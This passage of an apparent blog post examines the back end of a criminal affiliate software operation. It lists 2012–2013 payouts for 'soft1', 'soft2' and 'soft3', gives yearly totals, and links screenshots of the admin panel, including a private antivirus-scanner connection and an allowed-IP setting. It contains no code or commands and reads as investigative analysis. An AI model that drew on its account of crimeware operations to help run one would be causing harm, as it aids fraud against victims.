2013-05-20-s2&nbsp;&nbsp;&nbsp; 2013-05-20 12:01&nbsp;&nbsp;&nbsp; 2013-05-20&nbsp; 17522.47 $&nbsp;&nbsp;&nbsp; soft2<br /> 96&nbsp;&nbsp;&nbsp; Payment till 2013-05-20&nbsp;&nbsp;&nbsp; 2013-05-20 12:01&nbsp;&nbsp;&nbsp; 2013-05-20&nbsp; 23605.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 93&nbsp;&nbsp;&nbsp; Payment till 2013-05-14-s1&nbsp;&nbsp;&nbsp; 2013-05-14 09:31&nbsp;&nbsp;&nbsp; 2013-05-14&nbsp; 8145.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 94&nbsp;&nbsp;&nbsp; Payment till 2013-05-14-s2&nbsp;&nbsp;&nbsp; 2013-05-14 09:31&nbsp;&nbsp;&nbsp; 2013-05-14&nbsp; 37932.57 $&nbsp;&nbsp;&nbsp; soft2<br /> 95&nbsp;&nbsp;&nbsp; Payment till 2013-05-14-s3&nbsp;&nbsp;&nbsp; 2013-05-14 09:31&nbsp;&nbsp;&nbsp; 2013-05-14&nbsp; 147.23 $&nbsp;&nbsp;&nbsp; soft3<br /> 92&nbsp;&nbsp;&nbsp; Payment till 2013-05-12-s3&nbsp;&nbsp;&nbsp; 2013-05-12 20:10&nbsp;&nbsp;&nbsp; 2013-05-12&nbsp; 45.94 $&nbsp;&nbsp;&nbsp; soft3<br /> 91&nbsp;&nbsp;&nbsp; Payment till 2013-05-12-s2&nbsp;&nbsp;&nbsp; 2013-05-12 20:10&nbsp;&nbsp;&nbsp; 2013-05-12&nbsp; 7742.64 $&nbsp;&nbsp;&nbsp; soft2<br /> 90&nbsp;&nbsp;&nbsp; Payment till 2013-05-12-s1&nbsp;&nbsp;&nbsp; 2013-05-12 20:10&nbsp;&nbsp;&nbsp; 2013-05-12&nbsp; 18495.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 89&nbsp;&nbsp;&nbsp; Payment till 2013-05-09-s2&nbsp;&nbsp;&nbsp; 2013-05-09 18:05&nbsp;&nbsp;&nbsp; 2013-05-09&nbsp; 15787.84 $&nbsp;&nbsp;&nbsp; soft2<br /> 88&nbsp;&nbsp;&nbsp; Payment till 2013-05-09&nbsp;&nbsp;&nbsp; 2013-05-09 18:05&nbsp;&nbsp;&nbsp; 2013-05-09&nbsp; 1525.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 87&nbsp;&nbsp;&nbsp; Payment till 2013-05-06-s2&nbsp;&nbsp;&nbsp; 2013-05-06 12:36&nbsp;&nbsp;&nbsp; 2013-05-06&nbsp; 41202.71 $&nbsp;&nbsp;&nbsp; soft2<br /> 86&nbsp;&nbsp;&nbsp; Payment till 2013-05-06&nbsp;&nbsp;&nbsp; 2013-05-06 12:36&nbsp;&nbsp;&nbsp; 2013-05-06&nbsp; 1000.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 85&nbsp;&nbsp;&nbsp; Payment till 2013-05-03-s2&nbsp;&nbsp;&nbsp; 2013-05-03 20:16&nbsp;&nbsp;&nbsp; 2013-05-03&nbsp; 15549.01 $&nbsp;&nbsp;&nbsp; soft2<br /> 84&nbsp;&nbsp;&nbsp; Payment till 2013-05-03&nbsp;&nbsp;&nbsp; 2013-05-03 20:15&nbsp;&nbsp;&nbsp; 2013-05-03&nbsp; 10260.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 83&nbsp;&nbsp;&nbsp; Payment till 2013-04-26-s3&nbsp;&nbsp;&nbsp; 2013-04-26 10:22&nbsp;&nbsp;&nbsp; 2013-04-26&nbsp; 19.98 $&nbsp;&nbsp;&nbsp; soft3<br /> 82&nbsp;&nbsp;&nbsp; Payment till 2013-04-26-s2&nbsp;&nbsp;&nbsp; 2013-04-26 10:21&nbsp;&nbsp;&nbsp; 2013-04-26&nbsp; 302.14 $&nbsp;&nbsp;&nbsp; soft2<br /> 81&nbsp;&nbsp;&nbsp; Payment till 2013-04-26-s1&nbsp;&nbsp;&nbsp; 2013-04-26 10:21&nbsp;&nbsp;&nbsp; 2013-04-26&nbsp; 26370.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 78&nbsp;&nbsp;&nbsp; Payment till 2013-04-22&nbsp;&nbsp;&nbsp; 2013-04-22 16:30&nbsp;&nbsp;&nbsp; 2013-04-22&nbsp; 1650.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 79&nbsp;&nbsp;&nbsp; Payment till 2013-04-22-s2&nbsp;&nbsp;&nbsp; 2013-04-22 16:30&nbsp;&nbsp;&nbsp; 2013-04-22&nbsp; 51337.47 $&nbsp;&nbsp;&nbsp; soft2<br /> 80&nbsp;&nbsp;&nbsp; Payment till 2013-04-22-s3&nbsp;&nbsp;&nbsp; 2013-04-22 16:30&nbsp;&nbsp;&nbsp; 2013-04-22&nbsp; 50.26 $&nbsp;&nbsp;&nbsp; soft3<br /> 77&nbsp;&nbsp;&nbsp; Payment till 2013-04-19-s3&nbsp;&nbsp;&nbsp; 2013-04-19 11:42&nbsp;&nbsp;&nbsp; 2013-04-19&nbsp; 312.18 $&nbsp;&nbsp;&nbsp; soft3<br /> 76&nbsp;&nbsp;&nbsp; Payment till 2013-04-19-s2&nbsp;&nbsp;&nbsp; 2013-04-19 11:42&nbsp;&nbsp;&nbsp; 2013-04-19&nbsp; 9142.67 $&nbsp;&nbsp;&nbsp; soft2<br /> 75&nbsp;&nbsp;&nbsp; Payment till 2013-04-19-s1&nbsp;&nbsp;&nbsp; 2013-04-19 11:41&nbsp;&nbsp;&nbsp; 2013-04-19&nbsp; 40610.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 74&nbsp;&nbsp;&nbsp; Payment till 2013-04-12-s1&nbsp;&nbsp;&nbsp; 2013-04-12 12:52&nbsp;&nbsp;&nbsp; 2013-04-12&nbsp; 13810.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 73&nbsp;&nbsp;&nbsp; Payment till 2013-04-12&nbsp;&nbsp;&nbsp; 2013-04-12 12:52&nbsp;&nbsp;&nbsp; 2013-04-12&nbsp; 9717.46 $&nbsp;&nbsp;&nbsp; soft2<br /> 72&nbsp;&nbsp;&nbsp; Payment till 2013-04-10&nbsp;&nbsp;&nbsp; 2013-04-10 19:18&nbsp;&nbsp;&nbsp; 2013-04-10&nbsp; 22673.76 $&nbsp;&nbsp;&nbsp; soft2<br /> 71&nbsp;&nbsp;&nbsp; Payment till 2013-04-08-s1&nbsp;&nbsp;&nbsp; 2013-04-08 14:57&nbsp;&nbsp;&nbsp; 2013-04-08&nbsp; 11020.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 70&nbsp;&nbsp;&nbsp; Payment till 2013-04-08-s2&nbsp;&nbsp;&nbsp; 2013-04-08 14:56&nbsp;&nbsp;&nbsp; 2013-04-08&nbsp; 40822.98 $&nbsp;&nbsp;&nbsp; soft2<br /> 69&nbsp;&nbsp;&nbsp; Payment till 2013-03-27&nbsp;&nbsp;&nbsp; 2013-03-27 03:51&nbsp;&nbsp;&nbsp; 2013-03-27&nbsp; 1819.36 $&nbsp;&nbsp;&nbsp; soft3<br /> 68&nbsp;&nbsp;&nbsp; Payment till 2013-03-22&nbsp;&nbsp;&nbsp; 2013-03-22 14:02&nbsp;&nbsp;&nbsp; 2013-03-22&nbsp; 0.12 $&nbsp;&nbsp;&nbsp; soft3<br /> 67&nbsp;&nbsp;&nbsp; Payment till 2013-03-09-s2&nbsp;&nbsp;&nbsp; 2013-03-09 18:35&nbsp;&nbsp;&nbsp; 2013-03-09&nbsp; 18825.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 66&nbsp;&nbsp;&nbsp; Payment till 2013-03-09&nbsp;&nbsp;&nbsp; 2013-03-09 18:34&nbsp;&nbsp;&nbsp; 2013-03-09&nbsp; 2749.03 $&nbsp;&nbsp;&nbsp; soft2<br /> 65&nbsp;&nbsp;&nbsp; Payment till 2013-03-06&nbsp;&nbsp;&nbsp; 2013-03-06 15:30&nbsp;&nbsp;&nbsp; 2013-03-06&nbsp; 72766.77 $&nbsp;&nbsp;&nbsp; soft2<br /> 64&nbsp;&nbsp;&nbsp; Payment till 2013-02-17-s2&nbsp;&nbsp;&nbsp; 2013-02-17 17:59&nbsp;&nbsp;&nbsp; 2013-02-17&nbsp; 8707.66 $&nbsp;&nbsp;&nbsp; soft2<br /> 63&nbsp;&nbsp;&nbsp; Payment till 2013-02-17-s1&nbsp;&nbsp;&nbsp; 2013-02-17 17:59&nbsp;&nbsp;&nbsp; 2013-02-17&nbsp; 11145.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 62&nbsp;&nbsp;&nbsp; Payment till 2013-02-14-s1&nbsp;&nbsp;&nbsp; 2013-02-14 18:49&nbsp;&nbsp;&nbsp; 2013-02-14&nbsp; 11580.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 61&nbsp;&nbsp;&nbsp; Payment till 2013-02-14&nbsp;&nbsp;&nbsp; 2013-02-14 18:45&nbsp;&nbsp;&nbsp; 2013-02-14&nbsp; 33485.69 $&nbsp;&nbsp;&nbsp; soft2<br /> 60&nbsp;&nbsp;&nbsp; Payment till 2013-02-13&nbsp;&nbsp;&nbsp; 2013-02-13 15:51&nbsp;&nbsp;&nbsp; 2013-02-13&nbsp; 540.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 59&nbsp;&nbsp;&nbsp; Payment till 2013-02-12&nbsp;&nbsp;&nbsp; 2013-02-12 19:42&nbsp;&nbsp;&nbsp; 2013-02-12&nbsp; 8087.24 $&nbsp;&nbsp;&nbsp; soft2<br /> 58&nbsp;&nbsp;&nbsp; Payment till 2013-02-11-dw&nbsp;&nbsp;&nbsp; 2013-02-11 17:13&nbsp;&nbsp;&nbsp; 2013-02-11&nbsp; 475.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 57&nbsp;&nbsp;&nbsp; Payment till 2013-02-11&nbsp;&nbsp;&nbsp; 2013-02-11 09:39&nbsp;&nbsp;&nbsp; 2013-02-11&nbsp; 2040.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 56&nbsp;&nbsp;&nbsp; Payment till 2013-02-10&nbsp;&nbsp;&nbsp; 2013-02-10 19:53&nbsp;&nbsp;&nbsp; 2013-02-10&nbsp; 694.00 $&nbsp;&nbsp;&nbsp; soft2<br /> 54&nbsp;&nbsp;&nbsp; Payment till 2013-02-09-peek&nbsp;&nbsp;&nbsp; 2013-02-09 18:27&nbsp;&nbsp;&nbsp; 2013-02-09&nbsp; 1566.83 $&nbsp;&nbsp;&nbsp; soft2<br /> 55&nbsp;&nbsp;&nbsp; Payment till 2013-02-09&nbsp;&nbsp;&nbsp; 2013-02-09 21:44&nbsp;&nbsp;&nbsp; 2013-02-09&nbsp; 11760.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 53&nbsp;&nbsp;&nbsp; Payment till 2013-02-08-123321&nbsp;&nbsp;&nbsp; 2013-02-08 21:06&nbsp;&nbsp;&nbsp; 2013-02-08&nbsp; 2369.42 $&nbsp;&nbsp;&nbsp; soft2<br /> 52&nbsp;&nbsp;&nbsp; Payment till 2013-02-08-dun&nbsp;&nbsp;&nbsp; 2013-02-08 21:05&nbsp;&nbsp;&nbsp; 2013-02-08&nbsp; 256.30 $&nbsp;&nbsp;&nbsp; soft2<br /> 51&nbsp;&nbsp;&nbsp; Payment till 2013-02-08&nbsp;&nbsp;&nbsp; 2013-02-08 13:23&nbsp;&nbsp;&nbsp; 2013-02-08&nbsp; 52957.66 $&nbsp;&nbsp;&nbsp; soft2<br /> 50&nbsp;&nbsp;&nbsp; Payment till 2013-02-06&nbsp;&nbsp;&nbsp; 2013-02-06 12:55&nbsp;&nbsp;&nbsp; 2013-02-06&nbsp; 7087.86 $&nbsp;&nbsp;&nbsp; soft2<br /> 49&nbsp;&nbsp;&nbsp; Payment till 2013-02-05-bobo&nbsp;&nbsp;&nbsp; 2013-02-05 16:18&nbsp;&nbsp;&nbsp; 2013-02-05&nbsp; 5000.00 $&nbsp;&nbsp;&nbsp; soft2<br /> 48&nbsp;&nbsp;&nbsp; Payment till 2013-02-05&nbsp;&nbsp;&nbsp; 2013-02-05 08:25&nbsp;&nbsp;&nbsp; 2013-02-05&nbsp; 21466.66 $&nbsp;&nbsp;&nbsp; soft2<br /> 47&nbsp;&nbsp;&nbsp; Payment till 2013-02-01&nbsp;&nbsp;&nbsp; 2013-02-01 17:17&nbsp;&nbsp;&nbsp; 2013-02-01&nbsp; 5777.70 $&nbsp;&nbsp;&nbsp; soft2<br /> 46&nbsp;&nbsp;&nbsp; Payment till 2013-01-28&nbsp;&nbsp;&nbsp; 2013-01-29 18:23&nbsp;&nbsp;&nbsp; 2013-01-28&nbsp; 23743.88 $&nbsp;&nbsp;&nbsp; soft2<br /> 44&nbsp;&nbsp;&nbsp; Payment till 2013-01-24&nbsp;&nbsp;&nbsp; 2013-01-24 17:55&nbsp;&nbsp;&nbsp; 2013-01-24&nbsp; 83145.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 45&nbsp;&nbsp;&nbsp; Payment till 2013-01-24-s2&nbsp;&nbsp;&nbsp; 2013-01-24 21:32&nbsp;&nbsp;&nbsp; 2013-01-24&nbsp; 26272.27 $&nbsp;&nbsp;&nbsp; soft2<br /> 42&nbsp;&nbsp;&nbsp; Payment till 2013-01-22&nbsp;&nbsp;&nbsp; 2013-01-22 07:59&nbsp;&nbsp;&nbsp; 2013-01-22&nbsp; 24400.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 41&nbsp;&nbsp;&nbsp; Payment till 2013-01-12&nbsp;&nbsp;&nbsp; 2013-01-12 17:46&nbsp;&nbsp;&nbsp; 2013-01-12&nbsp; 20200.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 39&nbsp;&nbsp;&nbsp; Payment till 2012-12-25&nbsp;&nbsp;&nbsp; 2012-12-25 13:36&nbsp;&nbsp;&nbsp; 2012-12-25&nbsp; 5515.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 38&nbsp;&nbsp;&nbsp; Payment till 2012-12-18&nbsp;&nbsp;&nbsp; 2012-12-18 21:31&nbsp;&nbsp;&nbsp; 2012-12-18&nbsp; 13905.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 37&nbsp;&nbsp;&nbsp; Payment till 2012-12-11&nbsp;&nbsp;&nbsp; 2012-12-11 19:47&nbsp;&nbsp;&nbsp; 2012-12-11&nbsp; 46435.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 36&nbsp;&nbsp;&nbsp; Payment till 2012-12-05&nbsp;&nbsp;&nbsp; 2012-12-05 07:38&nbsp;&nbsp;&nbsp; 2012-12-05&nbsp; 27045.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 35&nbsp;&nbsp;&nbsp; Payment till 2012-11-20&nbsp;&nbsp;&nbsp; 2012-11-20 10:37&nbsp;&nbsp;&nbsp; 2012-11-20&nbsp; 27320.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 34&nbsp;&nbsp;&nbsp; Payment till 2012-11-16&nbsp;&nbsp;&nbsp; 2012-11-16 11:13&nbsp;&nbsp;&nbsp; 2012-11-16&nbsp; 17440.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 33&nbsp;&nbsp;&nbsp; Payment till 2012-11-12&nbsp;&nbsp;&nbsp; 2012-11-12 18:15&nbsp;&nbsp;&nbsp; 2012-11-12&nbsp; 7705.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 32&nbsp;&nbsp;&nbsp; Payment till 2012-11-11&nbsp;&nbsp;&nbsp; 2012-11-11 16:03&nbsp;&nbsp;&nbsp; 2012-11-11&nbsp; 2450.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 31&nbsp;&nbsp;&nbsp; Payment till 2012-11-09&nbsp;&nbsp;&nbsp; 2012-11-09 14:44&nbsp;&nbsp;&nbsp; 2012-11-09&nbsp; 37095.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 30&nbsp;&nbsp;&nbsp; Payment till 2012-11-07&nbsp;&nbsp;&nbsp; 2012-11-07 16:19&nbsp;&nbsp;&nbsp; 2012-11-07&nbsp; 6170.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 29&nbsp;&nbsp;&nbsp; Payment till 2012-10-16&nbsp;&nbsp;&nbsp; 2012-10-16 17:12&nbsp;&nbsp;&nbsp; 2012-10-16&nbsp; 18435.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 28&nbsp;&nbsp;&nbsp; Payment till 2012-09-26&nbsp;&nbsp;&nbsp; 2012-09-26 09:23&nbsp;&nbsp;&nbsp; 2012-09-26&nbsp; 40610.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 27&nbsp;&nbsp;&nbsp; Payment till 2012-08-14&nbsp;&nbsp;&nbsp; 2012-08-14 18:41&nbsp;&nbsp;&nbsp; 2012-08-14&nbsp; 24150.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 26&nbsp;&nbsp;&nbsp; Payment till 2012-08-09&nbsp;&nbsp;&nbsp; 2012-08-09 19:10&nbsp;&nbsp;&nbsp; 2012-08-09&nbsp; 19760.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 25&nbsp;&nbsp;&nbsp; Payment till 2012-08-02&nbsp;&nbsp;&nbsp; 2012-08-02 08:30&nbsp;&nbsp;&nbsp; 2012-08-02&nbsp; 24890.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 24&nbsp;&nbsp;&nbsp; Payment till 2012-07-27&nbsp;&nbsp;&nbsp; 2012-07-27 18:31&nbsp;&nbsp;&nbsp; 2012-07-27&nbsp; 24677.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 23&nbsp;&nbsp;&nbsp; Payment till 2012-07-23&nbsp;&nbsp;&nbsp; 2012-07-23 15:38&nbsp;&nbsp;&nbsp; 2012-07-23&nbsp; 29102.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 22&nbsp;&nbsp;&nbsp; Payment till 2012-07-18&nbsp;&nbsp;&nbsp; 2012-07-18 15:41&nbsp;&nbsp;&nbsp; 2012-07-18&nbsp; 11528.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 21&nbsp;&nbsp;&nbsp; Payment till 2012-07-17&nbsp;&nbsp;&nbsp; 2012-07-17 00:26&nbsp;&nbsp;&nbsp; 2012-07-17&nbsp; 25035.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 20&nbsp;&nbsp;&nbsp; Payment till 2012-07-12&nbsp;&nbsp;&nbsp; 2012-07-12 19:11&nbsp;&nbsp;&nbsp; 2012-07-12&nbsp; 4600.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 19&nbsp;&nbsp;&nbsp; Payment till 2012-07-10&nbsp;&nbsp;&nbsp; 2012-07-10 15:32&nbsp;&nbsp;&nbsp; 2012-07-10&nbsp; 5940.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 18&nbsp;&nbsp;&nbsp; Payment till 2012-07-05&nbsp;&nbsp;&nbsp; 2012-07-05 13:39&nbsp;&nbsp;&nbsp; 2012-07-05&nbsp; 4435.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 17&nbsp;&nbsp;&nbsp; Payment till 2012-07-01&nbsp;&nbsp;&nbsp; 2012-07-01 13:25&nbsp;&nbsp;&nbsp; 2012-07-01&nbsp; 835.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 16&nbsp;&nbsp;&nbsp; Payment till 2012-06-27&nbsp;&nbsp;&nbsp; 2012-06-27 17:13&nbsp;&nbsp;&nbsp; 2012-06-27&nbsp; 9905.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 14&nbsp;&nbsp;&nbsp; Payment till 2012-06-19&nbsp;&nbsp;&nbsp; 2012-06-19 16:47&nbsp;&nbsp;&nbsp; 2012-06-19&nbsp; 3570.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 15&nbsp;&nbsp;&nbsp; Payment till 2012-06-19-2&nbsp;&nbsp;&nbsp; 2012-06-21 20:53&nbsp;&nbsp;&nbsp; 2012-06-19&nbsp; 17350.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 13&nbsp;&nbsp;&nbsp; Payment till 2012-06-06&nbsp;&nbsp;&nbsp; 2012-06-06 18:34&nbsp;&nbsp;&nbsp; 2012-06-06&nbsp; 3365.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 12&nbsp;&nbsp;&nbsp; Payment till 2012-05-25&nbsp;&nbsp;&nbsp; 2012-05-25 12:06&nbsp;&nbsp;&nbsp; 2012-05-25&nbsp; 4480.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 11&nbsp;&nbsp;&nbsp; Payment till 2012-05-18&nbsp;&nbsp;&nbsp; 2012-05-18 22:35&nbsp;&nbsp;&nbsp; 2012-05-18&nbsp; 9725.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 10&nbsp;&nbsp;&nbsp; Payment till 2012-05-10&nbsp;&nbsp;&nbsp; 2012-05-10 21:04&nbsp;&nbsp;&nbsp; 2012-05-10&nbsp; 8575.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 9&nbsp;&nbsp;&nbsp; Payment till 2012-04-26&nbsp;&nbsp;&nbsp; 2012-05-03 14:46&nbsp;&nbsp;&nbsp; 2012-04-26&nbsp; 3980.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 8&nbsp;&nbsp;&nbsp; Payment till 2012-04-19&nbsp;&nbsp;&nbsp; 2012-04-26 09:55&nbsp;&nbsp;&nbsp; 2012-04-19&nbsp; 9210.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 7&nbsp;&nbsp;&nbsp; Payment till 2012-04-12&nbsp;&nbsp;&nbsp; 2012-04-20 19:56&nbsp;&nbsp;&nbsp; 2012-04-12&nbsp; 8875.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 5&nbsp;&nbsp;&nbsp; Payment till 2012-04-02&nbsp;&nbsp;&nbsp; 2012-04-02 13:48&nbsp;&nbsp;&nbsp; 2012-04-02&nbsp; 12800.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 4&nbsp;&nbsp;&nbsp; Payment till 2012-03-26&nbsp;&nbsp;&nbsp; 2012-03-26 19:32&nbsp;&nbsp;&nbsp; 2012-03-26&nbsp; 2755.00 $&nbsp;&nbsp;&nbsp; soft1<br /> 2&nbsp;&nbsp;&nbsp; Payment till 2012-03-16&nbsp;&nbsp;&nbsp; 2012-03-16 20:34&nbsp;&nbsp;&nbsp; 2012-03-16&nbsp; 2212.25 $&nbsp;&nbsp;&nbsp; soft1<br /> 1&nbsp;&nbsp;&nbsp; Payment till 2012-03-12&nbsp;&nbsp;&nbsp; 2012-03-12 14:19&nbsp;&nbsp;&nbsp; 2012-03-12&nbsp; 4753.17 $&nbsp;&nbsp;&nbsp; soft1</div><p>The numbers are kinda crazy, so let's breakdown that in charts.<br /><br />If we total everything up and regroup by year, we get:</p><ul style="text-align: left;"><li>2012:&nbsp;&nbsp;$526632.42 → $526.63K</li><li>2013:&nbsp;&nbsp;$1440845.73&nbsp;→ $1.44M</li><li>2014:&nbsp;&nbsp;$46995.00&nbsp;→ $46.99K</li></ul><div class="separator" style="clear: both; text-align: center;"> </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiSV8WKB4Hi4mVGrWlVhq6RKtak74Jbu_u5HUaAtLEgFeV92uMISv_SwsTBEiENvlIXlkEbjPVIdJVmebYmcjuNqO53p_1Yo2wU25BMUE8exhpHsn_V2Dh5bK_Bf_SuQHpmmhmTNZ1cII/s1600/12-04-2014+14-14-16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiSV8WKB4Hi4mVGrWlVhq6RKtak74Jbu_u5HUaAtLEgFeV92uMISv_SwsTBEiENvlIXlkEbjPVIdJVmebYmcjuNqO53p_1Yo2wU25BMUE8exhpHsn_V2Dh5bK_Bf_SuQHpmmhmTNZ1cII/s1600/12-04-2014+14-14-16.png" /></a></div><p>&nbsp;&nbsp;</p><p>Here are the total payments per software type across all years:</p><ul style="text-align: left;"><li>soft1:&nbsp;$1,095,100.40 → $1.10M</li><li>soft2:&nbsp;$916,701.20 → $916.70K</li><li>soft3:&nbsp;$2,671.55 → $2.67K</li></ul><div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMthnoIaYabYw7QpfEYRKF3wuFOuq7rAaOSmAA86k1ZbBO3yHry2H-AxaK3KTUntbXlUOBkCs1cDLR2JwCIUwh38PT0OxyVNJZWSTrf4R3aDhNP29RvfLKzs9FM2g_LcY_a1zBP3CprnY/s1600/12-04-2014+14-38-17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMthnoIaYabYw7QpfEYRKF3wuFOuq7rAaOSmAA86k1ZbBO3yHry2H-AxaK3KTUntbXlUOBkCs1cDLR2JwCIUwh38PT0OxyVNJZWSTrf4R3aDhNP29RvfLKzs9FM2g_LcY_a1zBP3CprnY/s1600/12-04-2014+14-38-17.png" width="400" /></a></div><p> </p><p></p><p></p><p>The most 'busy' year is 2013:</p><ul style="text-align: left;"><li>soft2: $916,701.20 →&nbsp;$916.70K</li><li>soft1: $521,472.98 →&nbsp;$521.47K</li><li>soft3: $2,671.55&nbsp;→&nbsp;$2.67K</li></ul><p>A lot of money was distributed among affiliates.</p><p>Mass payement for 2014 to do:<br /> </p><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr-2I9f7RSox6ipS-Ktu7WKhRCPvy7HXCHS27mdBVfiOUuaqdkk1mEXA9POlDUERPvU66ljzsKzOugm8nOu6d4s6az5fwaADDYJPk3lABDaw7CJQ5HfIBHs7WEkoSuQHt-66SeRGwlo04/s1600/09-04-2014+14-11-58.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr-2I9f7RSox6ipS-Ktu7WKhRCPvy7HXCHS27mdBVfiOUuaqdkk1mEXA9POlDUERPvU66ljzsKzOugm8nOu6d4s6az5fwaADDYJPk3lABDaw7CJQ5HfIBHs7WEkoSuQHt-66SeRGwlo04/w400-h294/09-04-2014+14-11-58.png" width="400" /></a></div> <br /> Edit texts:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBDFK2jAt0IlqgNe_1SQZWSGj8nnAEENMl7U9XebTP6oPr8moshQClT4N7ELuvFFtiP8WmonELLhl4WND8h7zVqS6Kfkjce3wWNZwrHdj6kVssKREdJvWx0QRtUJJWr4wu-AwSWcoPGo/s1600/09-04-2014+14-06-56.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBDFK2jAt0IlqgNe_1SQZWSGj8nnAEENMl7U9XebTP6oPr8moshQClT4N7ELuvFFtiP8WmonELLhl4WND8h7zVqS6Kfkjce3wWNZwrHdj6kVssKREdJvWx0QRtUJJWr4wu-AwSWcoPGo/s1600/09-04-2014+14-06-56.png" width="400" /></a></div> <br /> Home page text edit:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifCmS72amOPffa1Z_T5tQI0pK_C9voSZ7txveSR3HwIHTttMC7Aw3IxuNM0L-d7syJizMGLq3gbph4rDlgzfI_fEmckFNQLfsb2kK5vWpUZa5Kgk8jZj7sUotVNpwdf6JMPcmSCoiFM3Q/s1600/09-04-2014+14-07-34.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifCmS72amOPffa1Z_T5tQI0pK_C9voSZ7txveSR3HwIHTttMC7Aw3IxuNM0L-d7syJizMGLq3gbph4rDlgzfI_fEmckFNQLfsb2kK5vWpUZa5Kgk8jZj7sUotVNpwdf6JMPcmSCoiFM3Q/s1600/09-04-2014+14-07-34.png" width="400" /></a></div> <br /> Private AV scanner config (chk4me.com connection):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKv8dl1XfNorvP6DHfK4EHUErBbvSLfrieu1-J8ARVNJRWIzaGYv_mt-Nf7WYe-pXBpE1XvWEmnlhmyyv0Rt8TRUT3h3NxDqUvQidjrRLkKKOTrepVqb4eTc_ToEBwVTkJFUDXMYTCzo/s1600/09-04-2014+14-08-11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKv8dl1XfNorvP6DHfK4EHUErBbvSLfrieu1-J8ARVNJRWIzaGYv_mt-Nf7WYe-pXBpE1XvWEmnlhmyyv0Rt8TRUT3h3NxDqUvQidjrRLkKKOTrepVqb4eTc_ToEBwVTkJFUDXMYTCzo/w400-h155/09-04-2014+14-08-11.png" width="400" /></a></div> <br />Allowed IPs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a 